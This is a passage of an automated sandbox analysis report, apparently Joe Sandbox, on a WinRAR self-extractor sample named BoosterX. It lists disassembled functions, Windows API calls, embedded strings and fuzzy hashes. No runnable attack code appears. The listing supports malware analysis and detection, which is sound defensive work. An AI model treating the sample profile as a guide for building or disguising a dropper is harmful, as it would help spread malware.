                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                                                    • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                    • API String ID: 431506467-1315819833
                                                    • Opcode ID: 934b9c1a3412f36c545f982de326ba61b21e501abc14814ed042a99284b1f3e4
                                                    • Instruction ID: d401dcd8f5ba3855c676a81dbd8a8b6a94794466b628a70139270d5e0207093d
                                                    • Opcode Fuzzy Hash: 934b9c1a3412f36c545f982de326ba61b21e501abc14814ed042a99284b1f3e4
                                                    • Instruction Fuzzy Hash: E4B1BF62F09B83A5FB009FA8D4442BC2362AB85799F504236DE9CE6BD9DF3CE145C344
                                                    Function 00007FF6C0376E00 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 204memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$Global$AllocCreateStream
                                                    • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                    • API String ID: 2868844859-1533471033
                                                    • Opcode ID: 0c7c52e401b8d11eced88253f3d41f1411c2599d6453e61bec2c7b8e04503a21
                                                    • Instruction ID: cd603f2c6622f85f2f026bb45e9cb3825cee7ab423402b3ec28fcd04e5ac3f73
                                                    • Opcode Fuzzy Hash: 0c7c52e401b8d11eced88253f3d41f1411c2599d6453e61bec2c7b8e04503a21
                                                    • Instruction Fuzzy Hash: 7381AE22F08A43A5FB00DFA9D9542ED2371AB4578AF400236DE9DD7B9AEF38D506C344
                                                    Function 00007FF6C038E5D0 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                    • API String ID: 3215553584-2617248754
                                                    • Opcode ID: a60231409e47c1a5672abfa229f1b0c42138c6649af1949bad2eb6332146811d
                                                    • Instruction ID: d33eca2d457c3e59c59b980356984ad9673f2f1f401245b8b735f6a6fec30257
                                                    • Opcode Fuzzy Hash: a60231409e47c1a5672abfa229f1b0c42138c6649af1949bad2eb6332146811d
                                                    • Instruction Fuzzy Hash: 6641AB72A19B86A9EB00CF25E8417AD33A4EB58398F014636EE9CC7B95DF3CD125C344
                                                    Function 00007FF6C037F310 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageObjectSend$ClassDeleteLongName
                                                    • String ID: STATIC
                                                    • API String ID: 2845197485-1882779555
                                                    • Opcode ID: 0a32551ddf3b327544de21b3e538b695597bcc4fc0cc33eb1cc93d7c3056c0d2
                                                    • Instruction ID: c540955a445330a01e0a9f40cc830deb2569ff4e7bb248637a65ef52cdcc519e
                                                    • Opcode Fuzzy Hash: 0a32551ddf3b327544de21b3e538b695597bcc4fc0cc33eb1cc93d7c3056c0d2
                                                    • Instruction Fuzzy Hash: 53318425B08A53A6FA60AF1AAA147BA2391BF89BD6F440430DD8DC7B95DF3CD4068740
                                                    Function 00007FF6C037AE10 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ItemTextWindow
                                                    • String ID: LICENSEDLG
                                                    • API String ID: 2478532303-2177901306
                                                    • Opcode ID: 5e69cc00c892a1ed4ceb77280b1a6400356bae2dc9350c12f29b595a45a8884e
                                                    • Instruction ID: d9dca70591fde81e10b3dd433acd0e98729fd5da2e914c97390ef366040d85d2
                                                    • Opcode Fuzzy Hash: 5e69cc00c892a1ed4ceb77280b1a6400356bae2dc9350c12f29b595a45a8884e
                                                    • Instruction Fuzzy Hash: F441AB25B0CE53E2FB549F59E91477923A1AF89F86F140134D98EC7BA5CF3CA6868700
                                                    Function 00007FF6C0378758 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 415COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID: $
                                                    • API String ID: 3668304517-227171996
                                                    • Opcode ID: 247688ddbdbe316bb5652999d32d4be79bac05f2d15fc7f94ce6e99227d45787
                                                    • Instruction ID: 76b14f9105e35ab0bc94430a66d393f662d2986dc197e91d9c624b1a2790406f
                                                    • Opcode Fuzzy Hash: 247688ddbdbe316bb5652999d32d4be79bac05f2d15fc7f94ce6e99227d45787
                                                    • Instruction Fuzzy Hash: 0FF1AC62F14643A0EE149F69D6881BC2362AB45BA9F505632CE9DD7BD9EF7CE180C340
                                                    Function 00007FF6C038576C Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 317COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 2940173790-393685449
                                                    • Opcode ID: 3e10ce34ec1ec2318b4e5d1a096f68ad678d9ed54216a6dc3b478c18613d0621
                                                    • Instruction ID: ed52bd7a41ba3f5b712f329456a5237a6342890437e96764b6d563da8f8f8e55
                                                    • Opcode Fuzzy Hash: 3e10ce34ec1ec2318b4e5d1a096f68ad678d9ed54216a6dc3b478c18613d0621
                                                    • Instruction Fuzzy Hash: 8AE1AE72A087839AEB209F64D4803AD7BA0FB44B5AF140277DA8DC7796DF38E585C710
                                                    Function 00007FF6C0364EF8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 158COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: AllocClearStringVariant
                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                    • API String ID: 1959693985-3505469590
                                                    • Opcode ID: 408e286e95d7be2333e7e980e9c5bf6a4dc44dd0e8b0d4c37376681f41bb0957
                                                    • Instruction ID: c93dc10584a4fd9fba8781356890aecbd0bb24617ac453f6766e1d17dbbdff93
                                                    • Opcode Fuzzy Hash: 408e286e95d7be2333e7e980e9c5bf6a4dc44dd0e8b0d4c37376681f41bb0957
                                                    • Instruction Fuzzy Hash: 2E712776A14A06A5EB20CF25E8806AD77B4FB89B99F455132EE8EC3B64CF38D144C740
                                                    Function 00007FF6C038726C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6C0387473,?,?,?,00007FF6C03851DE,?,?,?,00007FF6C0385199), ref: 00007FF6C03872F1
                                                    • GetLastError.KERNEL32(?,?,00000000,00007FF6C0387473,?,?,?,00007FF6C03851DE,?,?,?,00007FF6C0385199), ref: 00007FF6C03872FF
                                                    • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6C0387473,?,?,?,00007FF6C03851DE,?,?,?,00007FF6C0385199), ref: 00007FF6C0387329
                                                    • FreeLibrary.KERNEL32(?,?,00000000,00007FF6C0387473,?,?,?,00007FF6C03851DE,?,?,?,00007FF6C0385199), ref: 00007FF6C038736F
                                                    • GetProcAddress.KERNEL32(?,?,00000000,00007FF6C0387473,?,?,?,00007FF6C03851DE,?,?,?,00007FF6C0385199), ref: 00007FF6C038737B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                    • String ID: api-ms-
                                                    • API String ID: 2559590344-2084034818
                                                    • Opcode ID: c3b9cc9cdd52f2350940838b7b06db5a4f889f983fd09e5162c1733cb5f95556
                                                    • Instruction ID: 22d551916de44aa59ac283b2c20f27b0a8f8a5ff58fad520cab2de7e22f05d54
                                                    • Opcode Fuzzy Hash: c3b9cc9cdd52f2350940838b7b06db5a4f889f983fd09e5162c1733cb5f95556
                                                    • Instruction Fuzzy Hash: D031F225B1AA43B1EE12DF12A8046792396FF48BA2F594637DD9DCB390EF7CE1408351
                                                    Function 00007FF6C0381584 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(?,?,?,00007FF6C03814F3,?,?,?,00007FF6C03818AA), ref: 00007FF6C03815AB
                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF6C03814F3,?,?,?,00007FF6C03818AA), ref: 00007FF6C03815C8
                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF6C03814F3,?,?,?,00007FF6C03818AA), ref: 00007FF6C03815E4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$HandleModule
                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                    • API String ID: 667068680-1718035505
                                                    • Opcode ID: b86a11e47b759afb9776b5a8196b9ce040a12c050a3cc6a343a5a4dac9788fc5
                                                    • Instruction ID: 578d37fe36e3b6929c4eeec782decdb69e551aa0dea811075670dddeedb8a079
                                                    • Opcode Fuzzy Hash: b86a11e47b759afb9776b5a8196b9ce040a12c050a3cc6a343a5a4dac9788fc5
                                                    • Instruction Fuzzy Hash: F5112D20E1AB03B1FEA18F01AA4027562996F49B96F485677CCDEC6350FF3CE4958610
                                                    Function 00007FF6C036ECA4 Relevance: 9.1, APIs: 6, Instructions: 120timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FF6C0365164: GetVersionExW.KERNEL32 ref: 00007FF6C0365195
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6C0355ABC), ref: 00007FF6C036ED0C
                                                    • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6C0355ABC), ref: 00007FF6C036ED18
                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6C0355ABC), ref: 00007FF6C036ED28
                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6C0355ABC), ref: 00007FF6C036ED36
                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6C0355ABC), ref: 00007FF6C036ED44
                                                    • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6C0355ABC), ref: 00007FF6C036ED85
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                    • String ID:
                                                    • API String ID: 2092733347-0
                                                    • Opcode ID: fd651a404897a6a4441ea403f02956d6baa9a0eb7a17f9813df5aa7066cb431e
                                                    • Instruction ID: ae9811f92289da020017a8bb020c4fe3ee6b9fc075162b3a40b2a5fd00251ed9
                                                    • Opcode Fuzzy Hash: fd651a404897a6a4441ea403f02956d6baa9a0eb7a17f9813df5aa7066cb431e
                                                    • Instruction Fuzzy Hash: 525169B2B146529BEB14CFA8D4401AC37B1F748B89B60403ADE8DE7B58DF38E556CB00
                                                    Function 00007FF6C036EF90 Relevance: 9.1, APIs: 6, Instructions: 80timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                    • String ID:
                                                    • API String ID: 2092733347-0
                                                    • Opcode ID: 75a8bc4378bee31fccdfb2974230a450bdf33b57f85e7c22afbcf2edf14db1b8
                                                    • Instruction ID: 16d4da24585f9b2a4555d21835d4ff981e99b61b3c101c4a05591e5c5ccd1f42
                                                    • Opcode Fuzzy Hash: 75a8bc4378bee31fccdfb2974230a450bdf33b57f85e7c22afbcf2edf14db1b8
                                                    • Instruction Fuzzy Hash: BD313862B10A52DEEB04CFB5E8801AC3770FB08759B54502AEE8ED7B58EF38D495C710
                                                    Function 00007FF6C03678D8 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID: .rar$exe$rar$sfx
                                                    • API String ID: 3668304517-630704357
                                                    • Opcode ID: 2be4155a22cf9f3d89ff384b654e6c2ace79baf959f8f82acd945f480ed79c49
                                                    • Instruction ID: 25a4dbede25ccf0701ceaa37d002063f5d243a0d4467856a86eb6e89f1d63c33
                                                    • Opcode Fuzzy Hash: 2be4155a22cf9f3d89ff384b654e6c2ace79baf959f8f82acd945f480ed79c49
                                                    • Instruction Fuzzy Hash: 18A1C522A14A47A0EB049F65D4592BC2361FF40B99F905236DE9EC77E9DF3CE685C340
                                                    Function 00007FF6C0385C68 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: abort$CallEncodePointerTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 2889003569-2084237596
                                                    • Opcode ID: ab04bccd114fd37ee07c78e6a8355f7d33a779087ea2a313566685aba8f4470c
                                                    • Instruction ID: 6f1f4727135d6f610d2cf52712f6dd226a27407f727180bba8fca4945997ca23
                                                    • Opcode Fuzzy Hash: ab04bccd114fd37ee07c78e6a8355f7d33a779087ea2a313566685aba8f4470c
                                                    • Instruction Fuzzy Hash: 86917F73A08B829AE710CF65E8402AD7BA0FB44789F14426BEE8DD7B55DF38E195C700
                                                    Function 00007FF6C0384F00 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                    • String ID: csm$f
                                                    • API String ID: 2395640692-629598281
                                                    • Opcode ID: ec9dc00a1498f0518f52aab0520fd36c16a5f49c97d71af4407016564852814a
                                                    • Instruction ID: 61c7c9d77bd2af472c24b5517f2e028f9dc1a34ffd34f82ceea7f855e48253c6
                                                    • Opcode Fuzzy Hash: ec9dc00a1498f0518f52aab0520fd36c16a5f49c97d71af4407016564852814a
                                                    • Instruction Fuzzy Hash: A551D072A19603A6EB14CF21E444A293795FB40B8EF508277DE9EC7788DF79E841C790
                                                    Function 00007FF6C035CEF0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 139COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
